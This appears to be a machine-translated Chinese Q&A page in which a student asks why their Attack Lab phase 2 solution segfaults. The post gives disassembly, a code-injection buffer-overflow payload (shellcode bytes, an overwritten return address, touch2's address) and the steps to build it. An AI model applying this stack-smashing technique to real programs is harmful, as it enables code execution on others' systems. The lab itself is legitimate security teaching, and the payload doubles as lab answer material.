Attacklab phase2 你造成了分段错误

问题描述 投票:0回答:0

这是我的攻击实验室 getbuf 和 touch1 , touch 2 信息:

00000000004018c2 <getbuf>:
  4018c2:   48 83 ec 18             sub    $0x18,%rsp
  4018c6:   48 89 e7                mov    %rsp,%rdi
  4018c9:   e8 7e 02 00 00          callq  401b4c <Gets>
  4018ce:   b8 01 00 00 00          mov    $0x1,%eax
  4018d3:   48 83 c4 18             add    $0x18,%rsp
  4018d7:   c3                      retq   

00000000004018d8 <touch1>:
  4018d8:   48 83 ec 08             sub    $0x8,%rsp
  4018dc:   c7 05 16 3c 20 00 01    movl   $0x1,0x203c16(%rip)        # 6054fc <vlevel>
  4018e3:   00 00 00 
  4018e6:   bf 57 32 40 00          mov    $0x403257,%edi
  4018eb:   e8 d0 f3 ff ff          callq  400cc0 <puts@plt>
  4018f0:   bf 01 00 00 00          mov    $0x1,%edi
  4018f5:   e8 a7 04 00 00          callq  401da1 <validate>
  4018fa:   bf 00 00 00 00          mov    $0x0,%edi
  4018ff:   e8 2c f5 ff ff          callq  400e30 <exit@plt>

0000000000401904 <touch2>:
  401904:   48 83 ec 08             sub    $0x8,%rsp
  401908:   89 fa                   mov    %edi,%edx
  40190a:   c7 05 e8 3b 20 00 02    movl   $0x2,0x203be8(%rip)        # 6054fc <vlevel>
  401911:   00 00 00 
  401914:   39 3d ea 3b 20 00       cmp    %edi,0x203bea(%rip)        # 605504 <cookie>
  40191a:   74 28                   je     401944 <touch2+0x40>
  40191c:   be a8 32 40 00          mov    $0x4032a8,%esi
  401921:   bf 01 00 00 00          mov    $0x1,%edi
  401926:   b8 00 00 00 00          mov    $0x0,%eax
  40192b:   e8 b0 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401930:   bf 02 00 00 00          mov    $0x2,%edi
  401935:   e8 2c 05 00 00          callq  401e66 <fail>
  40193a:   bf 00 00 00 00          mov    $0x0,%edi
  40193f:   e8 ec f4 ff ff          callq  400e30 <exit@plt>
  401944:   be 80 32 40 00          mov    $0x403280,%esi
  401949:   bf 01 00 00 00          mov    $0x1,%edi
  40194e:   b8 00 00 00 00          mov    $0x0,%eax
  401953:   e8 88 f4 ff ff          callq  400de0 <__printf_chk@plt>
  401958:   bf 02 00 00 00          mov    $0x2,%edi
  40195d:   e8 3f 04 00 00          callq  401da1 <validate>
  401962:   eb d6                   jmp    40193a <touch2+0x36>

我已经完成了第 2 阶段的所有这些步骤:

  1. Vim cookie.txt 我们在里面有地址 0x4b7a4937

  2. 在Vim phase2.s下面写下并保存。 mov $0x4b7a4937, %rdi 退

  3. gcc -c phase2.s

  4. objdump -d phase2.o 你会得到如下信息:

phase2.o:文件格式 elf64-x86-64

.text部分的反汇编:

0000000000000000 <.text>: 0: 48 c7 c7 37 49 7a 4b mov $0x4b7a4937,%rdi 7: c3 retq

  1. 在 vim phase2.asm 中保存上面

  2. 将答案保存在 phase2.txt 中 48 c7 c7 37 49 7a 4b c3 // 第 4 部分答案 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 28 61 55 00 00 00 00 // 第 8 部分答案 04 19 40 00 00 00 00 00 // 触摸 2 地址

  3. gdb ctarget > b getbuf > r > 信息 r 回复 0x556128b0

  4. 0x556128b0 - 0x18 = 0x55612898

  5. 猫phase2.txt | ./hex2raw | ./ctarget

运行后我会得到以下错误:

Cookie: 0x4b7a4937
Type string:Touch2!: You called touch2(0x4b7a4937)
Valid solution for level 2 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time
FAILED

我找不到我的答案有什么问题。我关注了 youtube 和 github,我会得到相同的答案。

assembly segmentation-fault stack x86-64 buffer-overflow
最新问题
© www.soinside.com 2019 - 2024. All rights reserved.